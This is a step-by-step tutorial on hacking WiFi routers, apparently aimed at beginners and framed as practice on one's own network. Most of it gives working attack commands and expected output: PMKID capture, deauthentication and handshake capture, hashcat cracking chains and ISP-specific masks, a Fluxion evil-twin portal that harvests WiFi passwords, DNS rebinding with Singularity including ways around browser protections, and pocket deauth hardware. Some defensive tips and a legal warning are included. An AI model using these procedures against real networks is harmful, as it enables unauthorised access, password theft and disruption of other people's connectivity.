How WiFi Routers Actually Get Hacked in 2026 β And How to Do Every Single Attack (On Your Own Network)
47.1 million DDoS attacks last year. 600,000 routers bricked in 72 hours. 8-digit WiFi passwords cracked in 38 seconds. Your router is the single most attacked device in your house β and this guide shows you exactly how, command by command, even if youβve never opened a terminal before.
Every attack in this guide has exact terminal commands, expected output, what to do when it breaks, and the one trick nobody puts in tutorials.
Think of your WiFi router like the front door to your entire digital life. Every phone, laptop, smart TV, camera, and thermostat walks through it. Now imagine that door was built in 2019, the lock company went out of business, and someone already copied your key β they just havenβt walked in yet. Thatβs the state of home WiFi security right now. The scariest part? Most attacks below donβt require anyone to be anywhere near your house. The second scariest part? You can reproduce every single one on your own equipment for under $50.
πΊοΈ Every Attack in One Sentence β Read This First
Before diving into 1,000+ lines of commands, hereβs every attack type in one sentence with a physical-world analogy. Bookmark this β itβs your mental map for the entire guide.
| Attack | One-Line Analogy | Proximity Needed |
|---|---|---|
| CSRF | A webpage secretly mails a letter to your router saying βchange all the locksβ β and the router obeys because it doesnβt check who sent it | None β any webpage |
| DNS Rebinding | A Trojan Horse for your browser β a webpage tricks your browser into thinking itβs talking to a website, but itβs actually talking to your router | None β any webpage |
| UPnP Exploit | Your router has a βyes manβ feature that opens any door a stranger asks it to β no ID required | None β internet |
| TR-069 Backdoor | Your ISP left a spare key under the mat for maintenance β attackers found the mat | None β internet |
| PMKID Capture | Photocopying someoneβs house key while theyβre still using the door β the router hands you a copy if you just ask nicely | WiFi range |
| Handshake Crack | Recording the secret knock, then trying every possible knock pattern at home until one matches | WiFi range |
| Evil Twin | Building a perfect replica of your houseβs front door next to the real one β when you come home confused, you put your key in the fake one | WiFi range |
| Deauth Flood | Shouting βFIRE!β in a theater β everyone must leave, because WiFiβs emergency system doesnβt check whoβs yelling | WiFi range |
| Default Password Derivation | The manufacturer printed the house key right on the doorbell β you just need to know how to read it | WiFi range |
| Nearest Neighbor | Breaking into the apartment next door to reach your target through the shared wall β the attacker is on another continent | None β daisy-chain |
| Botnet Recruitment | A burglary crew that moves in, changes your locks, and uses your house as a hideout β and you never notice | None β internet |
| UART Debug | Finding a hidden maintenance hatch on the routerβs circuit board that gives you the master key for $5 | Physical access |
| Firmware Emulation | Downloading a copy of the routerβs brain and dissecting it on your laptop β no hardware needed | None β software only |
Trick: Print this table. When you read the detailed sections below, you already know what each attack DOES β the details just show you HOW.
π§ The Big Picture β What Changed and Why You Should Care
The old way (2015-ish): Someone parks outside your house with a laptop, captures your WiFi password handshake, and spends hours cracking it. Requires physical proximity, decent hardware, and actual skill.
The new way (2025-2026): Someone on a different continent visits a malicious webpage from a coffee shop, and your routerβs DNS settings silently change. Or a botnet infects your router through the internet without anyone touching WiFi at all. Or a $3 microchip the size of your thumbnail kicks every device off your network.
The attack landscape split into three layers:
| Layer | What It Means | Proximity Needed | How Common |
|---|---|---|---|
| Internet attacks | Hackers reach your router through the web β no WiFi needed | None β other side of the world | Very common |
| Proximity attacks | Someone within WiFi range (parked car, neighbor, same building) | ~50-100 meters | Common |
| Physical attacks | Someone opens your router and plugs into its debug ports | Touch the device | Rare (targeted) |
Key insight: The most dangerous attacks in 2026 are internet-based. They donβt need WiFi range, they donβt need hacking tools, and some of them need zero technical skill. Just a webpage.
π° Step Zero β From 'I Have a Windows Laptop' to 'I'm Ready to Hack'
Every WiFi hacking guide starts at Step 1 and assumes you already have everything running. This section IS Step 0 β the chapter nobody writes, where 80% of beginners quit.
What You Need (Shopping List)
| Item | Price | Why You Need It |
|---|---|---|
| Any laptop (8GB+ RAM) | You have one | Runs everything |
| USB stick (16GB+) | ~$5 | Kali Linux lives here |
| WiFi adapter (see table below) | $25-50 | Your laptopβs built-in WiFi canβt do attacks β more on this below |
| Spare router (eBay/thrift store) | $5-15 | Your legal practice target |
| Total | ~$40-70 | Thatβs it. Thatβs the whole setup. |
Why Your Laptopβs WiFi Card Canβt Hack
Your laptopβs built-in WiFi chip works in βmanaged modeβ β think of it like a phone call where you only hear the person youβre talking to. For WiFi attacks, you need βmonitor modeβ β thatβs like being able to hear EVERY conversation in the room, even ones not meant for you.
Most laptop WiFi chips (Intel, Broadcom) have their brains locked down with something called firmware β software baked into the chip that filters out everything except packets addressed to YOUR device. The chip physically CAN hear everything, but the firmware throws away anything that isnβt for you. Monitor mode tells the firmware βstop throwing things away β give me everything.β
Why only certain adapters work: Chips with open-source firmware (Atheros AR9271) let Linux fully control what gets filtered. Chips with closed firmware (Intel, Broadcom) say βnoβ when Linux asks for raw packets. Thatβs why a $1,200 laptop with an Intel WiFi card canβt do what a $25 USB adapter can.
Which Adapter to Buy First
If you buy ONE adapter, get the Alfa AWUS036ACM (~$40). It uses the MediaTek MT7612U chipset β the driver is built into Linux, zero installation needed. Plug it in, it works.
| Tier | Adapter | Chipset | Price | Bands | Why |
|---|---|---|---|---|---|
| Alfa AWUS036ACM | MT7612U | ~$40 | 2.4 + 5 GHz | Built-in Linux driver, zero setup, dual-band | |
| Alfa AWUS036NHA | AR9271 | ~$25 | 2.4 GHz only | Decade of reliability, works with every tool ever written | |
| Alfa AWUS036ACH | RTL8812AU | ~$50 | 2.4 + 5 GHz | Highest power, needs driver install on older kernels | |
| TP-Link TL-WN722N v2/v3 | RTL8188EUS | ~$15 | 2.4 GHz | v1 was great (Atheros) β v2/v3 quietly switched to a different chip that barely works | |
| Intel AX200/210/211 | Intel | Built-in | Both | Intel officially says βmonitor mode and packet injection are not supportedβ | |
| Any Broadcom | Various | Varies | Varies | Closed firmware, no monitor mode support |
Trick: Carry TWO adapters β one Atheros (AR9271) for guaranteed compatibility with every tool ever written, one MT7612U for dual-band coverage. Also β shorter USB cables improve injection success rate. And watch for counterfeit Alfa adapters on Amazon with inferior hardware revisions.
Installing Kali Linux (The Operating System for WiFi Hacking)
Kali Linux is a special version of Linux that comes pre-loaded with every WiFi hacking tool mentioned in this guide. You donβt install it on your laptop permanently β you put it on a USB stick and boot from it when you need it. Your Windows install stays untouched.
Step 1 β Download Kali:
Go to kali.org/get-kali β βLive Bootβ β download the ISO (itβs about 4GB).
Step 2 β Flash to USB:
Download Rufus (Windows) or balenaEtcher (any OS). Open it β select the Kali ISO β select your USB stick β click Start. Wait 5-10 minutes.
Trick: Ventoy (66K+ GitHub stars) lets you put MULTIPLE operating systems on one USB stick. Just drag ISO files onto the drive β Ventoy handles the rest. No reflashing when you want a different OS.
Step 3 β Boot from USB:
Restart your laptop β press F12/F2/DEL during startup (depends on manufacturer) β select βUSBβ from the boot menu β Kali loads.
Two critical things to disable in BIOS first:
- Secure Boot β Disabled (Kali wonβt boot otherwise)
- Fast Startup (Windows) β Disabled (prevents USB boot detection)
Step 4 β The Moment of Truth: Does WiFi Work?
This is where most beginners hit a wall. After Kali loads, click the WiFi icon in the top-right. If it shows networks β youβre good. If it shows nothing β your laptopβs internal WiFi chip doesnβt have a Linux driver.
The fix: Plug in your external WiFi adapter (the Alfa you just bought). It should appear immediately. If youβre using Kali just for WiFi attacks, the internal WiFi not working doesnβt matter β the external adapter is what youβll use for everything.
If the external adapter also doesnβt show up:
# Check if Linux sees the USB device
lsusb
# Look for your adapter's name (e.g., "Realtek" or "Ralink")
# Check if the wireless interface exists
iwconfig
# You should see wlan0 or wlan1
# If WiFi is blocked by software
rfkill list
# If it says "Soft blocked: yes" β run:
sudo rfkill unblock wifi
# Install Realtek driver if needed (for AWUS036ACH on older kernels)
sudo apt update && sudo apt install realtek-rtl88xxau-dkms
Trick: If your laptop uses a Broadcom BCM43142 chip (very common in budget laptops), internal WiFi will NEVER work in Kali without a specific community fix. Donβt waste hours β just use the external adapter. The adapter IS your WiFi card for hacking.
Step 5 β Verify Your Adapter Can Hack:
# Put adapter in monitor mode (the "listen to everything" mode)
sudo airmon-ng start wlan0
# Test if packet injection works (the "shout custom messages" ability)
sudo aireplay-ng --test wlan0mon
SUCCESS: You see βInjection is working!β β youβre ready for every attack in this guide.
FAIL: You see βNo Answerβ¦β β wrong adapter, or driver issue. Double-check the adapter tier table above.
Step 6 β Your First Scan (See Every WiFi Network Around You):
sudo airodump-ng wlan0mon
Your screen fills with a table. Hereβs what youβre looking at:
| Column | What It Means | What to Look For |
|---|---|---|
| BSSID | Routerβs MAC address (like a serial number) | This is how you target a specific network |
| PWR | Signal strength (-40 = strong, -70 = weak, -1 = driver doesnβt report) | Closer to 0 = stronger signal |
| CH | WiFi channel (1-14 for 2.4GHz) | Youβll lock onto this later |
| ENC | Encryption type (WPA2, WPA3, OPN) | WPA2 = crackable. OPN = open, no password |
| AUTH | Authentication (PSK = personal password, MGT = enterprise) | PSK = standard attacks work. MGT = different tools needed |
| ESSID | Network name (βHome-WiFi-5Gβ) | This is the name you see on your phone |
The bottom section shows clients β every phone and laptop connected to each network. Their MAC addresses, what networks theyβre searching for, and how much data theyβre sending.
You just saw every WiFi network and device within range. That was 6 commands. Letβs break things.
What NOT to do: Donβt scan from an apartment building and start attacking your neighborβs network. The legal consequences are real (CFAA penalties range from misdemeanor to 20 years federal). Every attack below is practiced on YOUR OWN equipment. The lab setup section at the bottom shows you how.
π Internet Attacks β They Don't Even Need Your WiFi
These attacks reach your router through your internet connection. The attacker could be on the other side of the planet. No WiFi adapter, no proximity, sometimes no skill needed at all.
CSRF β A Webpage Secretly Reconfigures Your Router
Youβre reading a recipe blog. Hidden in the page is an invisible box that sends a command to your router: βchange the DNS servers to mine.β DNS is like a phone book β it translates website names (google.com) into actual addresses (142.250.80.46). If an attacker controls your DNS, they control which websites you ACTUALLY visit. Type your bankβs URL, land on a perfect clone that steals your password.
Your router obeys the hidden command because youβre logged into the admin panel (which most people never log out of). The router doesnβt check who sent the request β it just does it.
A researcher tested this on a real ISP router (Globe Telecom, Philippines β CVE-2023-33534) and changed the admin password through a malicious HTML page. No hacking tools. No proximity. The router justβ¦ accepted it.
| Whatβs Happening | Why It Works | What Gets Compromised |
|---|---|---|
| Hidden webpage command hits 192.168.1.1 | Router doesnβt check where requests come from | DNS, admin password, port forwards |
| Your browser sends the request FOR the attacker | Youβre already logged in β browser includes your session | Everything behind the router |
| No tools, no proximity, no skill needed | Routers lack CSRF tokens (security checks modern websites have) | All devices on your network at once |
Trick: Log out of your router admin panel after every use. Better yet β use a completely separate browser (like Firefox) exclusively for router admin that you never use for regular browsing. Change your routerβs default IP from 192.168.1.1 to something random like 192.168.73.1 β automated CSRF attacks guess the default address.
DNS Rebinding β A Webpage Tricks Your Browser Into Attacking Your Router
This one is clever. You visit a webpage. The webpage says βI live at evil-site.com.β Your browser checks DNS (the phone book) β evil-site.com = attackerβs server. Page loads normally. Then the page asks for evil-site.com AGAIN β but this time the attackerβs phone book says: evil-site.com = 192.168.1.1 (your router).
Your browser thinks itβs still talking to the same website. But itβs now talking to your router. The attackerβs code is running commands on your routerβs admin panel from inside your own browser.
Singularity by NCC Group automates this entire attack. The βmultiple answersβ strategy achieves rebinding in ~3 seconds. With IPv6 dual-stack exploitation, sub-second.
Setting up Singularity (requires a server you control + a domain):
# Set up DNS records for your domain:
# A record: rebinder.yourdomain.com β your server IP
# NS record: dynamic.yourdomain.com β rebinder.yourdomain.com
# Free port 53 (DNS port)
sudo systemctl disable --now systemd-resolved.service
# Build and run
git clone https://github.com/nccgroup/singularity.git
cd singularity/cmd/singularity-server && go build
sudo ./singularity-server --HTTPServerPort 8080
Open http://rebinder.yourdomain:8080/manager.html β set Target Host to 192.168.1.1 β Target Port 80 β select hook-and-control.js payload (lets you browse the router panel through the victimβs browser) β pick a rebinding strategy.
| Strategy | Speed | How |
|---|---|---|
| First-then-second (default) | 40-60 seconds | Returns attacker IP first, router IP on second DNS query |
| Multiple answers | ~3 seconds | Returns both IPs in one DNS response |
| IPv6 dual-stack | Sub-second | Exploits how browsers pick between IPv4/IPv6 |
Chrome 142 (Oct 2025) partially killed this. Local Network Access (LNA) blocks requests from public websites to private IPs (192.168.x, 10.x). But three bypasses exist: (1) target 0.0.0.0 on Linux/macOS, (2) target the routerβs public WAN IP, (3) use CNAME records pointing to internal hostnames. Firefox and Safari donβt have LNA at all β DNS rebinding works fully against those browsers as of March 2026.
Trick: Change your routerβs default IP to something non-standard. Singularity guesses 192.168.1.1 and 192.168.0.1 by default. A random third octet breaks most automated setups.
UPnP β The Feature That Opens Your Firewall on Request, No Password Needed
UPnP (Universal Plug and Play) was designed so your Xbox could automatically open the right ports for online gaming without you touching router settings. The problem: it has zero authentication. Any device β or any malicious script β can say βopen port 3389 to the internetβ and the router just does it. Port 3389 is Remote Desktop β now anyone on the internet can access your computer.
Rapid7 scanned the entire internet and found 80 million routers responding to UPnP requests. 40-50 million were exploitable. QBot malware actively uses UPnP to turn infected routers into anonymous proxy servers for criminals.
| UPnP Risk | Real-World Impact |
|---|---|
| Opens firewall ports silently | Your internal network becomes internet-accessible |
| Zero authentication | Any device on your network (including malware) can use it |
| Enabled by default on most routers | You probably have it on right now |
| CallStranger vulnerability (CVE-2020-12695) | Affects billions of devices β data theft + DDoS amplification |
Trick: Open your router settings right now and disable UPnP. If a game stops working (rare), manually open just that one port β takes 2 minutes and doesnβt leave your entire network exposed. The path is usually: Router Admin β Advanced β UPnP β OFF.
TR-069 β Your ISP Left a Spare Key Under the Mat
Your internet provider has a remote control for your router called TR-069 (runs on port 7547). ISPs use it to push firmware updates and change settings without sending a technician. Think of it like a maintenance backdoor β useful for the ISP, devastating if an attacker finds it.
Over 41 million devices have port 7547 exposed to the internet. Shodan scans found CWMP (the protocol on port 7547) is the single most common service in internet-wide scans β over 20 million devices running the same vulnerable software. CVE-2025-9961 in TP-Link routers lets attackers run any code they want through this port. 4,247 vulnerable routers confirmed in one scan.
In November 2016, a Mirai botnet variant hit Deutsche Telekom through TR-069 on port 7547, taking down 900,000 customer routers in one attack. The attacker used a simple shell injection in the TR-069 NewNTPServer field.
Trick: Check if your router has TR-069 enabled: Admin Panel β Advanced Settings β look for βCWMPβ or βTR-069.β If your ISP doesnβt actively manage your router, disable it. If the setting is grayed out, your ISP locked it β call and ask them to disable it.
π‘ Proximity Attacks β Within WiFi Range, Step by Step
These attacks need someone (or a device) within your WiFi signal range. Each one below has exact commands you can run on your own network.
PMKID Capture β The Silent WiFi Password Grab
This is the quietest WiFi attack that exists. Your adapter sends one special request to the router, and the router responds with something called a PMKID β a small piece of data that contains enough information to crack the WiFi password offline. No one gets disconnected. No alarms. The router justβ¦ hands it over.
Think of it like asking a bouncer βcan I see the guest list format?β He shows you the format, and from that format alone, you can figure out whoβs on the list.
The tool chain: hcxdumptool (captures the PMKID) β hcxpcapngtool (converts it to a crackable format) β hashcat (cracks it using your graphics card).
# Step 1: Stop services that fight over your WiFi adapter
# (NetworkManager keeps trying to "help" by changing your adapter's settings)
sudo systemctl stop NetworkManager wpa_supplicant
# Step 2: Check if your adapter works with hcxdumptool
hcxdumptool -I
sudo hcxdumptool -i wlan0 --check_driver
# Step 3: Scan for targets (let this run 30+ seconds)
sudo hcxdumptool -i wlan0 --do_rcascan
# Step 4: Capture PMKID from all nearby networks
sudo hcxdumptool -i wlan0 -w dump.pcapng
# Step 4 (alternative): Target ONE specific router by its MAC address
sudo hcxdumptool -i wlan0 -w dump.pcapng --filtermode=2 --filterlist_ap=AABBCCDDEEFF -c 6
# Step 5: Convert the capture to hashcat format
hcxpcapngtool -o hash.hc22000 -E essidlist dump.pcapng
# Step 6: Crack it (using your GPU)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Step 7: See the password
hashcat -m 22000 hash.hc22000 --show
What success looks like on screen: During capture, [FOUND PMKID] appears or a P marker shows in the display. After running hcxpcapngtool, the line EAPOL PMKIDs: 1 confirms you got one. When hashcat cracks it: KEY FOUND! [ thepassword ].
What failure looks like: 0 Packet(s) captured by kernel + Warning: too less packets received = your adapterβs driver doesnβt support the right mode. detected driver: rtl88XXau (this driver is not recommended) = switch to an MT7612U adapter.
| Common Error | What It Means | Fix |
|---|---|---|
| βinterface is not suitableβ | NetworkManager still running | Run sudo systemctl stop NetworkManager wpa_supplicant first |
| βwlan0mon is probably a monitor interfaceβ | You set monitor mode yourself β hcxdumptool does this internally | Use the regular interface name (wlan0), not wlan0mon |
Channel errors (EXPECTED: 2452, DETECTED: 245200000) |
USB 3.0 port timing bug | Plug adapter into a USB 2.0 port instead |
| Empty capture, zero PMKIDs | Target router doesnβt support PMKID | Only 802.11i/p/q/r routers with roaming support cache PMKIDs β switch to handshake method |
| Running in a VM | USB passthrough breaks timing-sensitive captures | Use bare-metal Linux (Kali on USB), not a VM |
Trick: PMKID capture is completely silent β nobody gets kicked off WiFi, no logs generated on most routers. But it only works on routers that support PMKID caching (roaming-capable access points). If the target doesnβt respond with a PMKID after 60 seconds, switch to the handshake method below.
Aircrack-ng β The Classic WiFi Password Crack
This is the traditional attack: kick one device off the network, record the βhandshakeβ (authentication exchange) when it reconnects, then crack the password offline. Unlike PMKID, this REQUIRES at least one device connected to the target.
# Step 1: See your adapter
airmon-ng
# Step 2: Kill services that interfere
sudo airmon-ng check kill
# Step 3: Switch to monitor mode
sudo airmon-ng start wlan0
# This creates "wlan0mon" β verify with: iwconfig
# Step 4: See all nearby networks
sudo airodump-ng wlan0mon
# Write down: target BSSID (MAC), channel number, and a connected client's MAC
# Step 5: Lock onto the target network and start recording
sudo airodump-ng --bssid 00:14:6C:7E:40:80 --channel 9 -w capture wlan0mon
Trick: Always include the
-wflag. Without it, youβll watch the handshake capture succeed but have no file to crack. This is the #1 beginner mistake β Black Hills InfoSec calls it βthe -w flag catastrophe.β
# Step 6: (OPEN A NEW TERMINAL) Kick one client off the network
# This forces their device to reconnect β and you record the reconnection handshake
sudo aireplay-ng --deauth 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon
# Step 7: Watch the airodump-ng screen β look for "WPA handshake: [BSSID]" in the TOP-RIGHT corner
# Once it appears β Ctrl+C to stop recording
# Step 8: Verify the file is good
aircrack-ng capture-01.cap
# Look for "WPA (1 handshake)"
# Step 9: Crack with a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:14:6C:7E:40:80 capture-01.cap
SUCCESS: KEY FOUND! [ password123 ] with the Master Key and Transient Key in hex.
Handshake never appears? Hereβs the troubleshooting ladder:
| Problem | Check | Fix |
|---|---|---|
| Injection not working | aireplay-ng --test wlan0mon |
Should print βInjection is working!β β if not, adapter/driver issue |
| Wrong client | No specific client MAC | Use -c CLIENT_MAC (directed deauth) instead of broadcast |
| Wrong channel | Airodump jumping channels | Lock to exact channel with --channel 9 |
| Enterprise network | AUTH column shows βMGTβ not βPSKβ | Different tools needed (EAPHammer) β this attack only works on personal (PSK) networks |
| PMF enabled | Network uses Protected Management Frames (802.11w) | Deauth attacks completely fail β the network encrypts management frames |
Trick: For GPU-accelerated cracking (MUCH faster than aircrack-ng), convert the capture:
hcxpcapngtool -o hash.hc22000 capture-01.capthen use hashcat. See the GPU benchmarks section for how fast this actually goes.
Trick: Press the SPACE BAR during airodump-ng to pause the scrolling. This lets you copy BSSIDs and client MACs without the display moving. Nobody tells beginners this.
Evil Twin β The Fake WiFi Network That Steals Passwords
An attacker creates a WiFi network with the exact same name as yours. Then they kick your devices off the real network. Your phone automatically reconnects β but to the fake one. A βre-enter your WiFi passwordβ page appears. You type it. The attacker now has your password.
Fluxion (5.6K GitHub stars, actively maintained as of Kali 2025.4) automates this entire attack.
Phase 1 β Capture a real handshake (so Fluxion can verify the password you type):
Launch ./fluxion.sh β select language β βHandshake Snooperβ β βAll channelsβ β airodump-ng scan window opens (wait 20-30 seconds, Ctrl+C) β pick target by number β choose aireplay-ng deauthentication β choose pyrit verification β set deauth every 30 seconds β synchronous mode β wait for handshake capture β select βPerform another attack.β
Phase 2 β Create the fake network:
βCaptive Portalβ β confirm same target β βRogue AP - hostapdβ β confirm handshake β βCreate an SSL Certificateβ β βDisconnectedβ mode (blocks internet to force portal interaction) β choose language β pick portal template (generic or router-specific like Netgear/TP-Link) β attack launches.
Six terminal windows open at once: DHCP, DNS, AP Service, Web Service, AP Authenticator (verifies passwords against the real handshake), and Jammer Service (keeps kicking devices off the real network).
What the victim sees: WiFi disconnects. Two networks with the same name β one encrypted (the real one, but itβs being jammed), one open (the fake one). Connect to the open one β browser shows a router update page asking for WiFi password. Enter the WRONG password β page rejects it (Fluxion checks against the captured handshake). Enter the CORRECT password β attack stops, victim reconnects to real network normally.
During a real pentest by Heretek, 2 out of 3 people entered their Office365 passwords within 90 seconds. During a university drill, 80% of users fell for it.
| Common Failure | Fix |
|---|---|
| Captive portal doesnβt load | Switch from hostapd to airbase-ng as the AP method |
| Canβt start the rogue AP | You need TWO WiFi interfaces β one jams the real network, one runs the fake network |
| Missing portal templates | Newer Fluxion versions moved templates to a Git submodule β manually place in attacks/Captive Portal/sites/generic/ |
Trick: If your devices suddenly disconnect from WiFi and you see a login page asking for your password through a browser popup β DONβT TYPE IT. Real routers never ask for your password through a webpage. This is almost certainly a fake portal. Disconnect, reconnect manually to the correct network.
ESP32 Marauder β $8 Attack Hardware With a Touchscreen
An ESP32 board costs $8-15, fits in your pocket, and runs Marauder firmware (10.1K GitHub stars) with a touchscreen GUI. No laptop needed β itβs a standalone WiFi attack device.
Which board to buy:
| Board | Price | What You Get |
|---|---|---|
| Cheap Yellow Display (CYD) ESP32-2432S028R | $8-15 | Cheapest entry β community Marauder port |
| Marauder v4/v4.5 (official, from Tindie shop) | $40-60 | Complete standalone experience |
| Marauder Mini | $50-70 | Smaller, joystick, GPS for wardriving |
| Apex 5 (Feb 2026, $99) | $99 | First with dual-band 2.4 + 5 GHz β five antennas |
| Flipper Zero + ESP32-S2 WiFi Dev Board | $170+ | Integrates with Flipper Zero |
Flash it in 60 seconds: Visit fzeeflasher.com in Chrome or Edge β select your board β pick firmware β click βProgram.β Done. For CYD boards, hold the BOOT button while plugging in USB.
What it can do through the touchscreen menu: Deauth flood (kick every device off any network), beacon spam (fill the area with hundreds of fake WiFi networks), PMKID capture, Evil Portal (fake login page), probe request sniffing, Karma attack (pretend to be every network anyoneβs phone is searching for), SAE commit flood (targeting WPA3), BLE spam, Airtag sniff/spoof, and card skimmer detection.
Battery: 3.7V LiPo with JST connector. CYD boards accept solderless battery mod kits (~$15). Any USB power bank also works. Verify battery polarity before connecting β wrong polarity destroys the board instantly.
Trick: A teenager with $8 and a YouTube tutorial can deploy a deauth attack against any WiFi network in range. If your devices keep randomly disconnecting, someone nearby might be running one of these. The Maltronics Deauth Detector ($10-20) or a $3 ESP8266 running DeauthDetector firmware will turn red when deauth frames are detected.
The Nearest Neighbor Attack β Hacking Through Someone Elseβs WiFi
Russian military intelligence (GRU/APT28) wanted to hack a Washington D.C. organization. Problem: the targetβs WiFi had multi-factor authentication. Solution: hack the building next door first (weaker security), find a laptop inside that building connected to both wired network AND WiFi, then use that laptopβs WiFi card to reach the targetβs network.
The attacker was thousands of miles away. They never set foot near any building. They daisy-chained through weaker neighbors until reaching the target.
Volexity, the cybersecurity firm that discovered it, said: βWe are unaware of any terminology describing this style of attackβ β so they named it.
Trick: This attack proves that your WiFi security is only as strong as your weakest neighborβs. If the business next door has an open network, an attacker can use it as a stepping stone to reach yours β without ever being in WiFi range of YOUR network.
π Skip the Crack β Calculate the Default Password Instead
Hereβs something most WiFi hacking guides never mention: millions of routers generate their default WiFi password from their own MAC address using a math formula. The MAC address is broadcast in every single WiFi frame. If you know the formula, you donβt need to crack anything β you just calculate the password in milliseconds.
How Default Passwords Get Generated
Router manufacturers need to put a unique password on every router at the factory. Writing truly random passwords is expensive (requires cryptographic hardware). So many manufacturers take a shortcut: they feed the routerβs MAC address (its serial number for networking) through a simple math formula and use the output as the default WiFi password.
The MAC address is visible to anyone within WiFi range β itβs in every beacon frame (the announcement your router broadcasts ~10 times per second).
The Thomson/SpeedTouch algorithm (the most famous): Take the serial number β remove certain digits β convert to hex β SHA-1 hash β first 5 bytes become the WiFi password, last 3 bytes become the network name suffix. This one algorithm affects Thomson, SpeedTouch, Orange (Spain), BBox, DMax, BigPond, O2Wireless, Otenet, Cyta, and BT Home Hub routers.
The UPC/UBEE algorithm: Researchers reverse-engineered the firmware and found the password generator. On 4,061 tested UBEE routers in the wild, the algorithm worked on 99.88% of them. The firmware even contains a profanity filter β if the generated password spells something rude, it substitutes letters.
D-Link broadcasts its own WPS PIN: Craig Heffner (devttys0) discovered that D-Linkβs WPS PIN is generated directly from the WAN MAC address. Since the BSSID (wireless MAC) is just the WAN MAC Β± 1, D-Link routers effectively broadcast their WPS PIN in every frame they send.
Tools That Calculate Default Passwords
| Tool | Supported Routers | Platform |
|---|---|---|
| RouterKeygen | Thomson, D-Link, Pirelli, Eircom, Verizon FiOS, FASTWEB, Huawei, Jazztel, Ono, Sky, EasyBox, and many more | Android / Desktop |
| upc_keys.py | UPC/UBEE routers (99.88% success rate on tested devices) | Python |
| thomson-key | Thomson/SpeedTouch family | Python |
| devttys0/wps pingen.py | D-Link WPS PINs from MAC address | Python |
A USENIX WOOT 2015 paper from Radboud University proved that most default WiFi passwords have only 24 bits of real randomness (the first 3 bytes of the MAC identify the manufacturer β those are public). Thatβs the difference between cracking a 10-character random password (centuries) and a β10-characterβ password with only 16 million actual possibilities (seconds).
Trick: Before running any cracking attack, check if the target network uses a default password. Run
airodump-ng, note the BSSID (MAC address) and ESSID (network name). If the network name follows a manufacturer pattern (SpeedTouchXXXXXX, UPC1234567, DLINK-ABCD), try RouterKeygen first. If the algorithm is known, you get the password in under a second β no GPU needed.
π» GPU Cracking Benchmarks β How Fast Does Your Password Actually Fall
WPA2 protects your WiFi password by running it through a meat grinder called PBKDF2 β it hashes the password 4,095 times in a row before producing the final key. This makes cracking ~63,000Γ slower than cracking a simple password hash (like MD5). The idea is that even if someone captures your handshake, cracking it takes too long to be practical.
Modern graphics cards (GPUs) donβt care. Theyβre designed to do billions of math operations per second β and password cracking is just math.
Real cracking speeds on current GPUs (hashcat mode 22000 β the current standard for WiFi):
| GPU | Speed (kH/s) | Price | Context |
|---|---|---|---|
| RTX 4090 | ~2,600 | ~$1,600 | The benchmark king |
| 8Γ RTX 4090 rig | ~20,800 | ~$13,000 | What professional crackers use |
| RTX 3090 | 1,106 | ~$800 | Solid mid-tier |
| RTX 3080 | 769-862 | ~$500 | Best value for the money |
| RX 7900 XTX | 1,466 | ~$900 | AMDβs best |
| RTX 3060 | ~525 | ~$300 | Budget option β still fast |
| GTX 1080 Ti | ~576 | ~$200 used | eBay special β surprisingly capable |
How fast YOUR password falls on a single RTX 4090:
| Password Type | Example | Time to Crack |
|---|---|---|
| 8 digits | 12345678 |
38 seconds |
| 8 lowercase letters | password |
~22 hours |
| 8 mixed-case + numbers | P4ssW0rd |
~2.7 years |
| 10 digits | 1234567890 |
~1 hour |
| RockYou wordlist (14.3M common passwords) | β | 5.5 seconds |
| 12+ mixed characters | Tr0ub4dor&3! |
Effectively never |
The Optimal Cracking Chain (What Practitioners Actually Run, In Order)
Donβt just throw RockYou at it and hope. This is the sequence professional pentesters use β each step is fast and catches passwords the previous step missed:
# 1. ESSID-based smart attack β uses the network name as a seed
# (people often base passwords on their network name)
hashcat -m 22000 hash.hc22000 essidlist -r best64.rule
# 2. WPA-specific wordlist from wpa-sec.stanev.org (crowdsourced cracked passwords)
hashcat -m 22000 hash.hc22000 wpa-sec-wordlist.txt
# 3. RockYou + best64 rule (the classic combo β catches most weak passwords)
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# 4. 8-digit numeric brute force β 38 seconds on RTX 4090
# (catches ISP default passwords that are just numbers)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
# 5. 10-digit numeric β ~1 hour
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
# 6. RockYou + OneRuleToRuleThemAll (cracked 68.36% of a 4.3M password test set)
hashcat -m 22000 hash.hc22000 rockyou.txt -r OneRuleToRuleThemAll.rule
# 7. Hybrid: wordlist + 4-digit append (catches "password1234" patterns)
hashcat -m 22000 hash.hc22000 -a 6 rockyou.txt ?d?d?d?d
Trick: Pre-filter ALL wordlists to WPA2βs valid length range (8-63 characters). This eliminates passwords hashcat would reject anyway and gives 3-4Γ speedup:
awk 'length>=8 && length<=63' rockyou.txt > rockyou-wpa.txt
Always use -O (optimized kernels) and -w 4 (maximum workload) on dedicated cracking rigs.
ISP-Specific Password Patterns β The Surgical Approach
Generic wordlists work. But knowing HOW your target ISP generates default passwords turns a 24-hour crack into a 5-second one.
| ISP / Router | Default Password Pattern | Keyspace | Time on RTX 4090 |
|---|---|---|---|
| Indian ISPs (BSNL) | 8-digit numeric (often phone number digits) | 10^8 = 100M | 38 seconds |
| BT HomeHub | 10 chars from [2-9, a-f] |
14^10 β 29 billion | ~24 minutes (8Γ 4090) |
| Virgin Media | 8 chars from [a-z minus i,o] |
24^8 β 110 billion | ~90 minutes (8Γ 4090) |
| Italian TIM PN51T | 8-digit numeric + WPS PIN = 12345670 | 10^8 | 38 seconds + WPS instant |
| Verizon G3100 | [word][digit][digit][word][digit][digit][word] |
~77 bits | ~24 days (RTX 4090) |
# BT HomeHub mask: characters [2-9, a-f] at 10 positions
hashcat -m 22000 hash.hc22000 -a 3 -1 23456789abcdef ?1?1?1?1?1?1?1?1?1?1
# Custom rule to append "!2025" to every word (catches "[word]!2025" patterns)
# Add this line to a file called custom.rule:
# c$!$2$0$2$5
hashcat -m 22000 hash.hc22000 rockyou.txt -r custom.rule
What NOT to do: Use mode 2500 or mode 16800 β both are deprecated and broken in current hashcat. Always use -m 22000. Donβt try changing the mode number on old captures β reconvert with hcxpcapngtool.
